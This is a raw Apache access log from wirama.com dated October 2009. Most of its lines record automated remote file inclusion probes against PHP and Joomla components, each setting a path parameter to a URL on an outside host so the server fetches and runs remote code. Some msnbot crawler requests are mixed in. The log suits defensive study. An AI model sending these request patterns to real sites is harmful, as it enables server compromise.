206.225.23.4 - - [04/Oct/2009:15:13:48 -0700] "GET /logs/access_090331.log/skin/zero%A7vote/login.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
207.58.152.241 - - [04/Oct/2009:15:15:06 -0700] "GET /logs/access_090401.log////////?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
207.58.152.241 - - [04/Oct/2009:15:15:06 -0700] "GET ///////?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 200 921 "-" "Mozilla/5.0" "wirama.com"
207.58.152.241 - - [04/Oct/2009:15:15:06 -0700] "GET /logs////////?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 200 3148 "-" "Mozilla/5.0" "wirama.com"
115.68.22.76 - - [04/Oct/2009:15:19:03 -0700] "GET /logs/access_090801.log////////?mosConfig_absolute_path=http://www.genesismania.net/bbs/icon/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
115.68.22.76 - - [04/Oct/2009:15:19:03 -0700] "GET /logs////////?mosConfig_absolute_path=http://www.genesismania.net/bbs/icon/copyright.txt?? HTTP/1.1" 200 3148 "-" "Mozilla/5.0" "wirama.com"
115.68.22.76 - - [04/Oct/2009:15:19:03 -0700] "GET ///////?mosConfig_absolute_path=http://www.genesismania.net/bbs/icon/copyright.txt?? HTTP/1.1" 200 921 "-" "Mozilla/5.0" "wirama.com"
64.150.183.219 - - [04/Oct/2009:15:19:20 -0700] "GET /logs/?CONFIG_EXT[LANGUAGES_DIR]=http://bizadmin.hongik.ac.kr/bbs/data/__zbSessionTMP/fx29id1.txt?? HTTP/1.1" 200 3137 "-" "Mozilla/5.0" "wirama.com"
64.150.183.219 - - [04/Oct/2009:15:19:21 -0700] "GET /?CONFIG_EXT[LANGUAGES_DIR]=http://bizadmin.hongik.ac.kr/bbs/data/__zbSessionTMP/fx29id1.txt?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
64.150.183.219 - - [04/Oct/2009:15:19:25 -0700] "GET /logs/access_090401.log/?CONFIG_EXT[LANGUAGES_DIR]=http://bizadmin.hongik.ac.kr/bbs/data/__zbSessionTMP/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
115.68.22.76 - - [04/Oct/2009:15:20:13 -0700] "GET /logs/access_090401.log////////?mosConfig_absolute_path=http://www.genesismania.net/bbs/icon/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
207.7.108.203 - - [04/Oct/2009:15:20:46 -0700] "GET /logs/error.php?dirhttp://www.klickcomk.com/js/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
207.7.108.203 - - [04/Oct/2009:15:20:46 -0700] "GET /error.php?dirhttp://www.klickcomk.com/js/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
207.7.108.203 - - [04/Oct/2009:15:21:08 -0700] "GET /logs/errors.php?dir=http://www.klickcomk.com/js/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
207.7.108.203 - - [04/Oct/2009:15:21:08 -0700] "GET /errors.php?dir=http://www.klickcomk.com/js/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
65.55.232.10 - - [04/Oct/2009:15:22:07 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.wirama.com"
65.55.232.10 - - [04/Oct/2009:15:22:07 -0700] "GET /_private/ HTTP/1.1" 200 675 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.wirama.com"
61.100.5.136 - - [04/Oct/2009:15:22:14 -0700] "GET /skin/zero%A7vote/login.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.100.5.136 - - [04/Oct/2009:15:22:14 -0700] "GET /logs/access_090801.log/skin/zero%A7vote/login.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.100.5.136 - - [04/Oct/2009:15:22:14 -0700] "GET /logs/skin/zero%A7vote/login.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.100.5.136 - - [04/Oct/2009:15:22:39 -0700] "GET /logs/access_090331.log/skin/zero%A7vote/login.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.100.5.136 - - [04/Oct/2009:15:27:51 -0700] "GET /logs/access_090801.log/skin/zero%A7vote/login.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.100.5.136 - - [04/Oct/2009:15:27:51 -0700] "GET /logs/skin/zero%A7vote/login.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.100.5.136 - - [04/Oct/2009:15:27:51 -0700] "GET /skin/zero%A7vote/login.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.106.155 - - [04/Oct/2009:15:27:52 -0700] "GET /_private/?D=A HTTP/1.1" 200 675 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
61.100.5.136 - - [04/Oct/2009:15:28:44 -0700] "GET /logs/access_090331.log/skin/zero%A7vote/login.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
64.150.183.219 - - [04/Oct/2009:15:37:02 -0700] "GET /logs/access_090601.log/?CONFIG_EXT[LANGUAGES_DIR]=http://bizadmin.hongik.ac.kr/bbs/data/__zbSessionTMP/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.106.235 - - [04/Oct/2009:15:44:54 -0700] "GET /_private/?N=D HTTP/1.1" 200 675 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
222.236.47.182 - - [04/Oct/2009:15:45:36 -0700] "GET /?CONFIG_EXT[LANGUAGES_DIR]=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt??? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
222.236.47.182 - - [04/Oct/2009:15:45:36 -0700] "GET /logs/?CONFIG_EXT[LANGUAGES_DIR]=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt??? HTTP/1.1" 200 3137 "-" "Mozilla/5.0" "wirama.com"
222.236.47.182 - - [04/Oct/2009:15:45:37 -0700] "GET /logs/access_090401.log/?CONFIG_EXT[LANGUAGES_DIR]=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.135.134.235 - - [04/Oct/2009:15:45:38 -0700] "GET /logs/access_090401.log/?CONFIG_EXT[LANGUAGES_DIR]=http://bizadmin.hongik.ac.kr/bbs/data/__zbSessionTMP/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.135.134.235 - - [04/Oct/2009:15:45:38 -0700] "GET /logs/?CONFIG_EXT[LANGUAGES_DIR]=http://bizadmin.hongik.ac.kr/bbs/data/__zbSessionTMP/fx29id1.txt?? HTTP/1.1" 200 3137 "-" "Mozilla/5.0" "wirama.com"
61.135.134.235 - - [04/Oct/2009:15:45:39 -0700] "GET /?CONFIG_EXT[LANGUAGES_DIR]=http://bizadmin.hongik.ac.kr/bbs/data/__zbSessionTMP/fx29id1.txt?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
61.135.134.235 - - [04/Oct/2009:15:49:44 -0700] "GET /logs/access_090601.log/?CONFIG_EXT[LANGUAGES_DIR]=http://bizadmin.hongik.ac.kr/bbs/data/__zbSessionTMP/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.182 - - [04/Oct/2009:15:50:21 -0700] "GET /logs/access_090601.log/?CONFIG_EXT[LANGUAGES_DIR]=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.135.134.235 - - [04/Oct/2009:15:52:02 -0700] "GET /?CONFIG_EXT[LANGUAGES_DIR]=http://bizadmin.hongik.ac.kr/bbs/data/__zbSessionTMP/fx29id1.txt?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
61.135.134.235 - - [04/Oct/2009:15:52:02 -0700] "GET /logs/?CONFIG_EXT[LANGUAGES_DIR]=http://bizadmin.hongik.ac.kr/bbs/data/__zbSessionTMP/fx29id1.txt?? HTTP/1.1" 200 3137 "-" "Mozilla/5.0" "wirama.com"
61.135.134.235 - - [04/Oct/2009:15:52:02 -0700] "GET /logs/access_090401.log/?CONFIG_EXT[LANGUAGES_DIR]=http://bizadmin.hongik.ac.kr/bbs/data/__zbSessionTMP/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.135.134.235 - - [04/Oct/2009:15:55:21 -0700] "GET /logs/access_090601.log/?CONFIG_EXT[LANGUAGES_DIR]=http://bizadmin.hongik.ac.kr/bbs/data/__zbSessionTMP/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.207.136 - - [04/Oct/2009:16:31:17 -0700] "GET /tmp/?D=A HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.107.182 - - [04/Oct/2009:16:37:19 -0700] "GET / HTTP/1.1" 200 916 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.207.118 - - [04/Oct/2009:16:40:53 -0700] "GET /tmp/?M=A HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
81.12.13.152 - - [04/Oct/2009:16:46:27 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
81.12.13.152 - - [04/Oct/2009:16:46:27 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
81.12.13.152 - - [04/Oct/2009:16:46:27 -0700] "GET /logs/access_090601.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.207.30 - - [04/Oct/2009:16:51:47 -0700] "GET /?N=A HTTP/1.1" 200 916 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
81.169.141.144 - - [04/Oct/2009:17:01:41 -0700] "GET /logs/access_090601.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://hidost.com//images/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
81.169.141.144 - - [04/Oct/2009:17:01:41 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://hidost.com//images/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
81.169.141.144 - - [04/Oct/2009:17:01:41 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://hidost.com//images/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [04/Oct/2009:17:31:34 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [04/Oct/2009:17:31:34 -0700] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [04/Oct/2009:17:31:34 -0700] "GET /logs/access_090330.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [04/Oct/2009:17:31:38 -0700] "GET /logs/access_090801.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.208.60 - - [04/Oct/2009:17:34:48 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.60 - - [04/Oct/2009:17:34:48 -0700] "GET /?M=A HTTP/1.1" 200 916 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.207.27 - - [04/Oct/2009:17:44:37 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.wirama.com"
65.55.207.27 - - [04/Oct/2009:17:46:22 -0700] "GET /files/series_A.pdf HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.wirama.com"
65.55.208.60 - - [04/Oct/2009:17:47:34 -0700] "GET /?D=D HTTP/1.1" 200 916 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.230.156 - - [04/Oct/2009:18:05:49 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/4.0" "wirama.com"
65.55.230.156 - - [04/Oct/2009:18:05:49 -0700] "GET /_private/?D=A HTTP/1.1" 200 675 "-" "Mozilla/4.0" "wirama.com"
218.55.227.178 - - [04/Oct/2009:18:09:32 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.55.227.178 - - [04/Oct/2009:18:09:32 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.55.227.178 - - [04/Oct/2009:18:09:32 -0700] "GET /logs/access_090801.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.55.227.178 - - [04/Oct/2009:18:11:18 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.55.227.178 - - [04/Oct/2009:18:11:18 -0700] "GET /logs/access_090801.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.55.227.178 - - [04/Oct/2009:18:11:18 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.55.227.178 - - [04/Oct/2009:18:24:44 -0700] "GET /logs/access_090601.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.55.227.178 - - [04/Oct/2009:18:27:26 -0700] "GET /logs/access_090601.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
69.20.67.111 - - [04/Oct/2009:18:29:31 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
69.20.67.111 - - [04/Oct/2009:18:29:31 -0700] "GET /logs/access_090331.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
69.20.67.111 - - [04/Oct/2009:18:29:31 -0700] "GET /logs/access_090330.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
69.20.67.111 - - [04/Oct/2009:18:29:31 -0700] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
69.20.67.111 - - [04/Oct/2009:18:29:48 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
69.20.67.111 - - [04/Oct/2009:18:29:49 -0700] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
69.20.67.111 - - [04/Oct/2009:18:29:49 -0700] "GET /logs/access_090330.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
69.20.67.111 - - [04/Oct/2009:18:29:49 -0700] "GET /logs/access_090331.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
69.20.67.111 - - [04/Oct/2009:18:30:13 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
69.20.67.111 - - [04/Oct/2009:18:30:13 -0700] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
69.20.67.111 - - [04/Oct/2009:18:30:13 -0700] "GET /logs/access_090330.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
69.20.67.111 - - [04/Oct/2009:18:30:58 -0700] "GET /logs/access_090331.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.55.227.178 - - [04/Oct/2009:18:32:01 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.55.227.178 - - [04/Oct/2009:18:32:01 -0700] "GET /logs/access_090801.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.55.227.178 - - [04/Oct/2009:18:32:01 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
64.27.9.117 - - [04/Oct/2009:18:36:18 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
64.27.9.117 - - [04/Oct/2009:18:36:18 -0700] "GET /logs/access_090801.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
64.27.9.117 - - [04/Oct/2009:18:36:18 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.231.1.214 - - [04/Oct/2009:18:38:00 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.231.1.214 - - [04/Oct/2009:18:38:00 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.231.1.214 - - [04/Oct/2009:18:38:00 -0700] "GET /logs/access_090801.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.231.1.214 - - [04/Oct/2009:18:39:19 -0700] "GET /logs/access_090601.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.231.1.214 - - [04/Oct/2009:18:41:16 -0700] "GET /logs/access_090801.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.231.1.214 - - [04/Oct/2009:18:41:16 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.231.1.214 - - [04/Oct/2009:18:41:16 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.231.1.214 - - [04/Oct/2009:18:42:29 -0700] "GET /logs/access_090601.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
64.27.9.117 - - [04/Oct/2009:18:45:08 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
64.27.9.117 - - [04/Oct/2009:18:45:08 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
64.27.9.117 - - [04/Oct/2009:18:45:08 -0700] "GET /logs/access_090801.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
64.27.9.117 - - [04/Oct/2009:18:45:30 -0700] "GET /logs/access_090601.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
69.162.74.91 - - [04/Oct/2009:18:49:19 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.brembobrakesonline.co.uk/includes/nGagLiks/Files/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
69.162.74.91 - - [04/Oct/2009:18:49:20 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.brembobrakesonline.co.uk/includes/nGagLiks/Files/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
69.162.74.91 - - [04/Oct/2009:18:49:20 -0700] "GET /logs/access_090801.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.brembobrakesonline.co.uk/includes/nGagLiks/Files/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
69.162.74.91 - - [04/Oct/2009:18:49:54 -0700] "GET /logs/access_090601.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.brembobrakesonline.co.uk/includes/nGagLiks/Files/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.55.227.178 - - [04/Oct/2009:18:50:33 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.55.227.178 - - [04/Oct/2009:18:50:33 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.55.227.178 - - [04/Oct/2009:18:50:33 -0700] "GET /logs/access_090601.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
64.27.9.117 - - [04/Oct/2009:18:57:29 -0700] "GET /logs/access_090601.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
64.27.9.117 - - [04/Oct/2009:18:57:29 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
64.27.9.117 - - [04/Oct/2009:18:57:29 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
64.27.9.117 - - [04/Oct/2009:18:57:41 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
64.27.9.117 - - [04/Oct/2009:18:57:51 -0700] "GET /logs/access_090601.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
64.27.9.117 - - [04/Oct/2009:18:57:51 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
81.12.13.152 - - [04/Oct/2009:19:03:30 -0700] "GET /logs/access_090601.log/error.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
81.12.13.152 - - [04/Oct/2009:19:03:30 -0700] "GET /error.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
81.12.13.152 - - [04/Oct/2009:19:03:30 -0700] "GET /logs/error.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.23 - - [04/Oct/2009:19:05:33 -0700] "GET /logs/access_090331.log///admin/spaw/spaw_control.class.php?spaw_root=http://ipts.co.kr/bbs/upload/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.23 - - [04/Oct/2009:19:05:33 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://ipts.co.kr/bbs/upload/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.23 - - [04/Oct/2009:19:05:33 -0700] "GET /logs/access_090401.log///admin/spaw/spaw_control.class.php?spaw_root=http://ipts.co.kr/bbs/upload/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
